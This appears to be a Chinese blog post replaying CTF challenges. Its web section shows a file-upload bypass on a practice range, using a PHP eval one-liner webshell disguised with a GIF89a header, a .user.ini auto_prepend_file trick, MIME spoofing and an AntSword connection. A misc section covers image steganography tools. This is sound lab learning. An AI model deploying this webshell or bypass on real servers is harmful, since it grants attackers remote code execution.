第三届黄河流域网安技能挑战赛复现
Web
奶龙牌图片处理器2.0
这题,之前只了解过 .user.ini 文件,并为遇到实操题
但赛前差点就做到下面这题了,不多说,复现之前先看看下面这题
靶场:
攻防世界
没错,又做上文件上传题了,别看easy,如果没接触过的话当做题的时候是抠破头皮也想不到的
easyupload
一样的文件上传界面
然后发现只允许上传图片文件,文件 php标签内容被过滤了
用js标签也行不通,只好用短标签 <?=@eval($_POST['a']);?>
然后加上图片文件头 GIF89a
修改后缀为jpg上传成功但发现改了各种php后缀都行不通,然后去搜了一下发现要用到 .user.ini 文件
先说一下 auto_prepend_file 可以让所有的php文件自动的包含某个文件。
例如,这题就可以先上传一个 .user.ini 文件,再上传 yijuhua.jpg 文件,而 .user.ini 文件中包含特殊的语句,使上传的 yijuhua.jpg 文件上传到环境的所有的php文件目录下,当我们访问 yijuhua.jpg时,会使 yijuhua.jpg 中的一句话木马被解析。
新建一个 .user.ini 文件,写入以下内容:
GIF89a
auto_prepend_file=yijuhua.jpg然后在 yijuhua.jpg 里面写入以下一句话木马:
GIF89a
<?=eval($_POST['a']);?>这样一来和 .user.ini 和 yijuhua.jpg 同一目录下的所有php文件都会包含 yijuhua.jpg 文件。
上传 .user.ini 文件
但别忘了抓包改一下MIME类型(只允许图片的 image/jpeg)
上传成功
再上传yijuhua.jpg文件(直接上传就好)
上传成功后去访问一下图片路径
发现访问无果
查看了一下流量,应该是把它放入 uploads/index.php 目录下了
访问试试
好像访问成功了
执行一下查看php配置信息命令
可以执行
接下来蚁剑连接即可
打开可以看到我上传的文件确实在 uploads 文件及目录下
直接根目录下找flag即可
没了,其实和 .htaccess 文件的用法类似
只是 .htaccess 文件的作用是使特定后缀的文件按php文件进行解析;
而 .user.ini 文件是把特定文件放入所有php文件目录下,使访问的时候被解析。
接下来就看赛题吧
奶龙牌图片处理器2.0:
好家伙,环境打不开了,那只好先复现其他题目了
ok,web的环境暂时都打不开,只好先复现其它方向,后面可以开了再补吧
Misc
small_challenge
下载附件后解压缩,得到一张 小小挑战.png
用 010 打开,发现尾部信息隐藏着 flag.zip
那就 binwalk 一下,可以用 kali 但我感觉比较麻烦,就用 随波逐流 了
它直接给我分离出来了
打开之后发现里面又有一个压缩包
再解压又得到 flag.zip
再解压时发现需要密码
照样拖进 随波逐流
发现有 flag.txt 文件,尝试过爆破没有爆破出来,看了wp得到提示用 stegsolve
其实随波逐流也有stegsolve工具,但是都用这个着实不得行,尝试一下别的工具
比如就直接用stegsolve
哇哈哈哈,之前居然搞不懂 .jar 文件有什么用,就搭建ThinkPHP框架的时候涉及到,还去问师兄为什么我的解压出来是.jar文件为什么不是.exe文件(emmmm)这次在安装 stegsolve 时终于知道怎么用了
1、 需要下载 stegsolve 压缩包:通过网盘分享的文件:Stegsolve.zip
链接: https://pan.baidu.com/s/1s3rb71e8SX5nMhLhudaZKw?pwd=ydby 提取码: ydby
下载之后解压到一个目录得到 Stegsolve.jar
2、运行Stegsolve.jar
打开cmd,输入 java -jar "解压的Stegsolve.jar路径"
然后回车
stegsolve 就打开了
这个工具的好处呢就是开源的,它主要提供了多种图像处理算法,可以帮助用户分析和提取隐藏在图像中的数据。
记录一下功能吧,毕竟之前都没用过,只会用 随波逐流
File Format:文件格式;
Data Extract:数据提取;
Frame Browser:帧浏览器;
Image Combiner:拼图 图片拼接
可以获取RGB信息
发现是png
保存为6
用 inliteresearch扫一下
相关文章:
第三届黄河流域网安技能挑战赛复现
Web 奶龙牌图片处理器2.0 这题,之前只了解过 .user.ini 文件,并为遇到实操题 但赛前差点就做到下面这题了,不多说,复现之前先看看下面这题 靶场: 攻防世界 没错,又做上文件上传题了,别看…...
python 生成复杂表格,自动分页等功能
python 生成复杂表格,自动分页等功能 解决将Python中的树形目录数据转换为Word表格,并生成带有合并单元格的检测报告的问题。首先,要解决“tree目录数据”和“Word表格互换”,指将树…...
2025年高防IP与游戏盾深度对比:如何选择最佳防护方案?
2025年,随着DDoS攻击规模的指数级增长和混合攻击的常态化,高防IP与游戏盾成为企业网络安全的核心选择。然而,两者在功能定位、技术实现及适用场景上存在显著差异。本文结合最新行业实践与技术趋势,全面解析两者的优劣,…...
在 Vue + Vite 项目中,直接使用相对路径或绝对路径引用本地图片资源时,图片无法正确显示。
Vue 项目中静态资源引用问题 1.问题描述 在 Vue Vite 项目中,直接使用相对路径或绝对路径引用本地图片资源时,图片无法正确显示。 错误示例 javascript // 错误方式1:使用相对路径 const products [ { name: iPhone 14 Pro, image: .…...
)
判断手机屏幕上的横向滑动(左滑和右滑)
在JavaScript中,你可以通过监听触摸事件(touch events)来判断用户在手机屏幕上的横向滑动方向。以下是实现方法: 基本实现方案 let touchStartX 0; let touchEndX 0;function handleTouchStart(event) {touchStartX event.ch…...
用户有一个Django模型没有设置主键,现在需要设置主键。
用户有一个Django模型没有设置主键,现在需要设置主键。 from django.db import modelsclass CategoryAssistentModel(models.Model):second_level_category models.CharField(max_length100, nullTrue, blankTrue)third_level_category models.CharField(max_len…...
【文献阅读】EndoChat: Grounded Multimodal Large Language Model for Endoscopic Surgery
[2501.11347] EndoChat: Grounded Multimodal Large Language Model for Endoscopic Surgery 2025年1月 数据可用性 Surg-396K 数据集可在 GitHub - gkw0010/EndoChat 公开获取。 代码可用性 EndoChat 的代码可在 GitHub - gkw0010/EndoChat 下载。 摘要 近年来ÿ…...
React JSX语法介绍(JS XML)(一种JS语法扩展,允许在JS代码中编写类似HTML的标记语言)Babel编译
在线调试网站:https://zh-hans.react.dev/learn 文章目录 JSX:现代前端开发的声明式语法概述JSX的本质与工作原理什么是JSXJSX转换流程 JSX语法特性表达式嵌入(JSX允许在大括号内嵌入任何有效的JavaScript表达式)属性传递…...
【R语言编程绘图-箱线图】
基本箱线图绘制 使用ggplot2绘制箱线图的核心函数是geom_boxplot()。以下是一个基础示例,展示如何用iris数据集绘制不同物种(Species)的萼片长度(Sepal.Length)分布: library(ggplot2) ggplot(iris, aes(…...
【elasticsearch 7 或8 的安装及配置SSL 操作指引】
1.标题获取安装文件 cd /opt/tools wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.11.4-linux-x86_64.tar.gz tar -zxvf elasticsearch-8.11.4-linux-x86_64.tar.gz mv /opt/tools/elasticsearch-8.11.4 /opt/elasticsearch #配置vm.max_map_co…...
)
GitHub 趋势日报 (2025年05月23日)
本日报由 TrendForge 系统生成 https://trendforge.devlive.org/ 🌐 本日报中的项目描述已自动翻译为中文 📈 今日整体趋势 Top 10 排名项目名称项目描述今日获星总星数语言1All-Hands-AI/OpenHands🙌开放式:少代码,做…...
MongoDB索引:原理、实践与优化指南
为什么索引对数据库如此重要? 在现代应用开发中,数据库性能往往是决定用户体验的关键因素。想象一下,当你在电商平台搜索商品时,如果每次搜索都需要等待5-10秒才能看到结果,这种体验是多么令人沮丧。MongoDB作为最流行…...
SQL实战之索引优化(单表、双表、三表、索引失效)
文章目录 单表优化双表优化三表优化结论索引失效 单表优化 总体原则:建立索引并合理使用,避免索引失效 案例说明:查询category_ id 为1且comments大于1的情况下,views最多的article_ id: 传统方案: explain select id, author_ id…...
[7-1] ADC模数转换器 江协科技学习笔记(14个知识点)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 DMA(Direct Memory Access,直接内存访问)是一种硬件特性,它允许某些硬件子系统直接访问系统的内存,而无需CPU的介入。这样,CPU就可以处理其他任务,从而提高系…...
SSM整合:Spring+SpringMVC+MyBatis完美融合实战指南
前言 在Java企业级开发领域,SSM(SpringSpringMVCMyBatis)框架组合一直占据着重要地位。这三个轻量级框架各司其职又相互配合,为开发者提供了高效、灵活的开发体验。本文将深入探讨SSM框架的整合过程,揭示整合背后的原…...
Spring Boot分页查询进阶:整合Spring Data REST实现高效数据导航
目录: 引言分页查询基础回顾 2.1 Spring Data JPA分页接口 2.2 Pageable与Page的使用 2.3 常见分页参数设计Spring Data REST简介 3.1 HATEOAS与超媒体驱动API 3.2 Spring Data REST核心功能 3.3 自动暴露Repository接口整合Spring Boot与Spring Data REST 4.1 项目…...
阿里云 Serverless 助力海牙湾构建弹性、高效、智能的 AI 数字化平台
作者:赵世振、十眠、修省 “通过阿里云 Serverless 架构,我们成功解决了弹性能力不足、资源浪费与运维低效的痛点。SAE 的全托管特性大幅降低技术复杂度。未来,我们将进一步探索 Serverless 与 AI 的结合,为客户提供更智能的数字…...
升级node@22后运行npm install报错 distutils not found
从node20升级到node22后,在运行 npm install 的时候报了很多 gyp 错误,其中包括 npm error npm error ModuleNotFoundError: No module named distutils。 问题原因是我在使用 brew install node22 的过程中自动把 python 升级到了 3.13。而 distutils …...
一个开源的多播放源自动采集在线影视网站
这里写自定义目录标题 欢迎使用Markdown编辑器GoFilm简介项目部署1、前置环境准备1.2 redis 配置 film-api 后端服务配置将 GoFilm 项目根目录下的 film 文件夹上传到 linux 服务器的 /opt 目录下 2. 构建运行1. docker 部署1.1 安装 docker , docker compose 环境 注意事项: 2…...
)
【PhysUnits】10 减一操作(sub1.rs)
一、源码 代码实现了一个类型级别的减一操作(Sub1 trait),通过Rust的类型系统在编译期完成数值减一的计算。 //! 减一操作特质实现 / Decrement operation trait implementation //! //! 提供类型级别的减一计算 / Provides type-level decrement operationuse su…...
深度检测与动态透明度控制 - 基于Babylon.js的遮挡检测实现解析
首先贴出实现代码: OcclusionFader.ts import { AbstractEngine, Material, type Behavior, type Mesh, type PBRMetallicRoughnessMaterial, type Scene } from "babylonjs/core"; import { OcclusionTester } from "../../OcclusionTester"…...
Linux下使用socat将TCP服务转为虚拟串口设备
Linux下使用socat将TCP服务转为虚拟串口设备 socat是一个强大的网络工具,可以将TCP连接转换为虚拟串口设备,这在嵌入式开发、工业控制等领域非常有用。下面详细介绍如何实现这一功能。 基本原理 socat可以通过创建伪终端(PTY)来模拟串口设备ÿ…...
docker push 报错 denied: requested access to the resource is denied
问题:当 docker logout -> docker login 用户登录,但仍然无法 docker push $ docker push <username>/nginx-custom:v1 The push refers to repository [docker.io/jagger/nginx-custom] 340e6d3ea0c7: Preparing 941dd9dd8ee4: Preparing f6…...
epub→pdf | which 在线转换??好用!!
1、PDF派(free&quick) pdf转word_pdf转换成excel_pdf转换成ppt _纬来PDF转换器 评价:目前使用免费,转化的时候有进度条提示,总的来说比较快,50mb的文件在40秒内可以转换完成,推荐 2、pdfconvert(free…...
PBX、IP PBX、FXO 、FXS 、VOIP、SIP 的概念解析以及关系
PBX(Private Branch Exchange) 概念 :PBX 是专用交换机,是一种在企业或组织内部使用的电话交换系统。它允许内部用户之间以及内部用户与外部公共电话网络(PSTN)之间进行通信。例如,在一个大型企…...
MySQL数据高效集成到金蝶云星空的技术分享
MySQL数据集成到金蝶云星空的技术案例分享:SR新建调拨单内部供应商-深圳天一 在企业信息化系统中,数据的高效流动和准确对接是实现业务流程自动化的关键。本文将聚焦于一个具体的系统对接集成案例——将MySQL中的数据集成到金蝶云星空,以支持…...
git 命令之-git cherry-pick
今天得到一个通知,这个业务版本里面部分已经开发但还没测试的内容要新开一个分支提交,但是我已经有几个提交上去了,难道只能一个一个文件复制到新的分支吗?我不,我找到了这个git命令,可以解决我的困惑&…...
如何在STM32CubeMX下为STM32工程配置调试打印功能
为STM32工程配置调试打印功能 一、配置调试用的打印串口 #include <stdio.h> //标准输入输出库//1.在STM32CubeMX中打开并配置好某串口设备; //2.在main.c文件中添加如下代码行对输入输出重定向; //3.在文件开头包含stdio.h头文件。 #pragma im…...
Linux系统 - 基本概念
介绍一些Linux系统的基本概念 1 操作系统的核心—内核 “操作系统”通常包含两种不同含义。 1.指完整的软件包,这包括用来管理计算机资源的核心层软件,以及附带的所有标准软件工具,诸如命令行解释器、图形用户界面、文件操作工具…...
kerberos在无痕浏览器 获取用户信息失败 如何判断是否无痕浏览器
kerberos在无痕浏览器 获取用户信息失败 如何判断是否无痕浏览器 js 代码 其他地方用直接导入js getCurrentUserId 这是自己后端获取 域账号地址 我是成功返回200 //true普通浏览器 fasle 无痕浏览器 export const checkBrowserMode async () > {try {const response a…...